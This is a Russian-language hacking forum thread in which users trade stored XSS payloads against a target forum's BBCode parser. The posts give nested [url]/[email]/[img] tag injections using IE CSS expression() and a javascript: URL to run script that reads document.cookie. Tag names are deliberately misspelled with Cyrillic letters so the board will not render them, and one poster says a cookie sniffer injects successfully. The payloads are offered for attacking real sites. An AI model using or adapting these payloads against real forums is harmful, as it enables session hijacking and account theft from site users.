Ломаю голову уже какой день и никак дыру найти не могу Может кто-то уже сталкивался? Вот пример форума. Этот форум ломать не обязательно
Мда... ну и форум. В первыем минуты мне показалось что он сверх-защищеный. (по обилию тегов) Через 2 минуты я уже выделил две самых простых XSS. Их хватит. Если нет - берите ещё. Я сделаю видео. Code: [urл=http://a[еmail=s=`]a[/еmail]]a[/urл]`xss=`alert(document.cookie);this.xss=null` style=top:expression(eval(this.xss)); [iмg]http://[urл=http://s=`]aaaaa[/urл][/iмg]`xss=`alert(document.cookie);this.xss=null` style=top:expression(eval(this.xss)); ВНИМАНИЕ! Чтобы НАШ ФОРУМ не парсил (не зависимо от тега [СODE]) мой код, я НАМЕРЕННО написал URL через Л. И емейл тоже так написал. ПЕРЕПИШИТЕ САМИ!
Спаренные теги в правильном исполнении: HTML: [img]http://s.d[email]sa@sa/style=background:url(javascript:alert());[/img][/email]
Кстати, ты зря везде пихаешь знак `. Ведь он прокатывает только в IE. Если можно обойтись без него, то лучше его не использовать.
Ну... это как сказать. У меня все правильно. И снифер вставляется. Я проверял. Расчитано на то что Ie. Сейчас большинство его используют Так что нельзя назвать мое исполнение неправильным
Во, да ты дайшь басу Буду ждать ролик! Респект. Я день потратил и ничего не нашёл Ссылочку на видео не забудь оставить